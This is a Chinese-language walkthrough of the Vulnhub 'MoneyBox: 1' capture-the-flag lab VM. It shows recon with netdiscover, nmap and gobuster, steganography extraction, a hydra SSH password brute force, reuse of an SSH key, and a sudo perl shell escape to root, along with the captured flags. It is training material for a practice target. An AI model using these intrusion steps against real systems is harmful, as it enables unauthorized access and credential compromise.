Vulnhub之MoneyBox 1靶机详细测试过程
MoneyBox
作者: jason_huawen
靶机基本信息
名称:MoneyBox: 1
地址:
https://www.vulnhub.com/entry/moneybox-1,653/
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.84.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:27:23:f6 1 60 PCS Systemtechnik GmbH
192.168.56.228 08:00:27:31:4a:3d 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.228
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-27 06:38 EST
Nmap scan report for localhost (192.168.56.228)
Host is up (0.00026s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 1e:30:ce:72:81:e0:a2:3d:5c:28:88:8b:12:ac:fa:ac (RSA)
| 256 01:9d:fa:fb:f2:06:37:c0:12:fc:01:8b:24:8f:53:ae (ECDSA)
|_ 256 2f:34:b3:d0:74:b4:7f:8d:17:d2:37:b1:2e:32:f7:eb (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: MoneyBox
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:31:4A:3D (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds
NMAP扫描结果表明目标主机有3个开放端口:21(FTP)、22(SSH)、80(HTTP)
Get Access
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ ftp 192.168.56.228
Connected to 192.168.56.228.
220 (vsFTPd 3.0.3)
Name (192.168.56.228:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||25579|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Feb 26 2021 .
drwxr-xr-x 2 0 0 4096 Feb 26 2021 ..
-rw-r--r-- 1 0 0 1093656 Feb 26 2021 trytofind.jpg
226 Directory send OK.
ftp> get trytofind.jpg
local: trytofind.jpg remote: trytofind.jpg
229 Entering Extended Passive Mode (|||50090|)
150 Opening BINARY mode data connection for trytofind.jpg (1093656 bytes).
100% |********************************************************************************| 1068 KiB 73.91 MiB/s 00:00 ETA
226 Transfer complete.
1093656 bytes received in 00:00 (72.10 MiB/s)
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ ls
trytofind.jpg
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ exiftool trytofind.jpg
ExifTool Version Number : 12.44
File Name : trytofind.jpg
Directory : .
File Size : 1094 kB
File Modification Date/Time : 2021:02:26 03:48:17-05:00
File Access Date/Time : 2022:11:27 06:39:49-05:00
File Inode Change Date/Time : 2022:11:27 06:39:49-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 72
Y Resolution : 72
Image Width : 3984
Image Height : 2988
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 3984x2988
Megapixels : 11.9
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ steghide extract -sf trytofind.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ stegseek trytofind.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.22% (132.4 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$
FTP服务似乎没有获取有价值的信息。
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ curl http://192.168.56.228
<html>
<head><title>MoneyBox</title></head>
<body>
<h1><big>Hai Everyone......!</big></h1>
<h2>Welcome To MoneyBox CTF</h2>
<p><pre>
__ __ ____
| \/ | | _ \
| \ / | ___ _ __ ___ _ _| |_) | _____ __
| |\/| |/ _ \| '_ \ / _ \ | | | _ < / _ \ \/ /
| | | | (_) | | | | __/ |_| | |_) | (_) > <
|_| |_|\___/|_| |_|\___|\__, |____/ \___/_/\_\
__/ |
|___/ </p><br>
<p><b>it's a very simple Box.so don't overthink</b></p>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ gobuster dir -u http://192.168.56.228 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.228
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/27 06:42:54 Starting gobuster in directory enumeration mode
===============================================================
/blogs (Status: 301) [Size: 316] [--> http://192.168.56.228/blogs/]
/server-status (Status: 403) [Size: 279]
Progress: 217210 / 220561 (98.48%)===============================================================
2022/11/27 06:43:17 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ curl http://192.168.56.228/blogs/
<html>
<head><title>MoneyBox</title></head>
<body>
<h1>I'm T0m-H4ck3r</h1><br>
<p>I Already Hacked This Box and Informed.But They didn't Do any Security configuration</p>
<p>If You Want Hint For Next Step......?<p>
</body>
</html>
<!--the hint is the another secret directory is S3cr3t-T3xt-->
注释说有个目录S3cr3t-T3xt
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ curl http://192.168.56.228/S3cr3t-T3xt/
<html>
<head><title>MoneyBox</title></head>
<body>
<h1>There is Nothing In this Page.........</h1>
</body>
</html>
<!..Secret Key 3xtr4ctd4t4 >
注释说密钥是3xtr4ctd4t4,对了前面图片破解的时候没有成功,这个密码可能是图片的密码
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ steghide extract -sf trytofind.jpg
Enter passphrase:
wrote extracted data to "data.txt".
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ ls
data.txt trytofind.jpg
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ cat data.txt
Hello..... renu
I tell you something Important.Your Password is too Week So Change Your Password
Don't Underestimate it.......
这里可以知道:
-
用户名是renu
-
密码很弱,可以破解
那就用hydra破解:
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ hydra -l renu -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.228
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-27 06:59:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.228:22/
[22][ssh] host: 192.168.56.228 login: renu password: 987654321
Hydra很快就破解出来密码.
┌──(kali㉿kali)-[~/Vulnhub/MoneyBox]
└─$ ssh renu@192.168.56.228
renu@192.168.56.228's password:
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 08:53:43 2021 from 192.168.43.44
renu@MoneyBox:~$ id
uid=1001(renu) gid=1001(renu) groups=1001(renu)
renu@MoneyBox:~$ sudo -l
[sudo] password for renu:
Sorry, user renu may not run sudo on MoneyBox.
renu@MoneyBox:~$ ls -alh
total 40K
drwxr-xr-x 5 renu renu 4.0K Feb 26 2021 .
drwxr-xr-x 4 root root 4.0K Feb 26 2021 ..
-rw------- 1 renu renu 642 Feb 26 2021 .bash_history
-rw-r--r-- 1 renu renu 220 Apr 17 2019 .bash_logout
-rw-r--r-- 1 renu renu 3.5K Apr 17 2019 .bashrc
drwxr-xr-x 3 root root 4.0K Feb 26 2021 ftp
drwxr-xr-x 3 renu renu 4.0K Feb 26 2021 .local
-rw-r--r-- 1 renu renu 807 Apr 17 2019 .profile
drwx------ 2 renu renu 4.0K Feb 26 2021 .ssh
-rw-r--r-- 1 renu renu 64 Feb 26 2021 user1.txt
renu@MoneyBox:~$ cat user1.txt
Yes...!
You Got it User1 Flag
==> us3r1{F14g:0ku74tbd3777y4}
renu@MoneyBox:/home/lily$ ls -alh
total 36K
drwxr-xr-x 4 lily lily 4.0K Feb 26 2021 .
drwxr-xr-x 4 root root 4.0K Feb 26 2021 ..
-rw------- 1 lily lily 985 Feb 26 2021 .bash_history
-rw-r--r-- 1 lily lily 220 Feb 25 2021 .bash_logout
-rw-r--r-- 1 lily lily 3.5K Feb 25 2021 .bashrc
drwxr-xr-x 3 lily lily 4.0K Feb 25 2021 .local
-rw-r--r-- 1 lily lily 807 Feb 25 2021 .profile
drwxr-xr-x 2 lily lily 4.0K Feb 26 2021 .ssh
-rw-r--r-- 1 lily lily 65 Feb 26 2021 user2.txt
renu@MoneyBox:/home/lily$ cat user2.txt
Yeah.....
You Got a User2 Flag
==> us3r{F14g:tr5827r5wu6nklao}
提权
将Linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行该脚本,
脚本输出结果表明:
-rw-r--r-- 1 renu renu 393 Feb 26 2021 /home/renu/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRIE9tEEbTL0A+7n+od9tCjASYAWY0XBqcqzyqb2qsNsJnBm8cBMCBNSktugtos9HY9hzSInkOzDn3RitZJXuemXCasOsM6gBctu5GDuL882dFgz962O9TvdF7JJm82eIiVrsS8YCVQq43migWs6HXJu+BNrVbcf+xq36biziQaVBy+vGbiCPpN0JTrtG449NdNZcl0FDmlm2Y6nlH42zM5hCC0HQJiBymc/I37G09VtUsaCpjiKaxZanglyb2+WLSxmJfr+EhGnWOpQv91hexXd7IdlK6hhUOff5yNxlvIVzG2VEbugtJXukMSLWk2FhnEdDLqCCHXY+1V+XEB9F3 renu@debian
-rw-r--r-- 1 renu renu 222 Feb 26 2021 /home/renu/.ssh/known_hosts
|1|mgTwrdXSHFVHz1wLX0Ywab7Hw5U=|+bawRPsGTRpz9bdC3vRE478S4Sw= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC8xP+l2BvuK5pg2bEpcDV1GAoAI3kIpMznpUyfOJS29SF9N2XyYV1eEcvf0O8exXyxCs+RjVbk+8cxBs8K36CU=
-rw-r--r-- 1 lily lily 393 Feb 26 2021 /home/lily/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRIE9tEEbTL0A+7n+od9tCjASYAWY0XBqcqzyqb2qsNsJnBm8cBMCBNSktugtos9HY9hzSInkOzDn3RitZJXuemXCasOsM6gBctu5GDuL882dFgz962O9TvdF7JJm82eIiVrsS8YCVQq43migWs6HXJu+BNrVbcf+xq36biziQaVBy+vGbiCPpN0JTrtG449NdNZcl0FDmlm2Y6nlH42zM5hCC0HQJiBymc/I37G09VtUsaCpjiKaxZanglyb2+WLSxmJfr+EhGnWOpQv91hexXd7IdlK6hhUOff5yNxlvIVzG2VEbugtJXukMSLWk2FhnEdDLqCCHXY+1V+XEB9F3 renu@debian
ChallengeResponseAuthentication no
UsePAM yes
表明renu可以直接SSH到lily用户
renu@MoneyBox:/home/lily$ ssh lily@192.168.56.228
The authenticity of host '192.168.56.228 (192.168.56.228)' can't be established.
ECDSA key fingerprint is SHA256:8GzSoXjLv35yJ7cQf1EE0rFBb9kLK/K1hAjzK/IXk8I.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.228' (ECDSA) to the list of known hosts.
Linux MoneyBox 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Feb 26 09:07:47 2021 from 192.168.43.80
lily@MoneyBox:~$ sudo -l
Matching Defaults entries for lily on MoneyBox:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lily may run the following commands on MoneyBox:
(ALL : ALL) NOPASSWD: /usr/bin/perl
lily@MoneyBox:~$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
# cd /root
# ls -alh
total 28K
drwx------ 3 root root 4.0K Feb 26 2021 .
drwxr-xr-x 18 root root 4.0K Feb 25 2021 ..
-rw------- 1 root root 2.1K Feb 26 2021 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Feb 25 2021 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 228 Feb 26 2021 .root.txt
# cat .root.txt
Congratulations.......!
You Successfully completed MoneyBox
Finally The Root Flag
==> r00t{H4ckth3p14n3t}
I'm Kirthik-KarvendhanT
It's My First CTF Box
instagram : ____kirthik____
See You Back....
#
成功提权。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
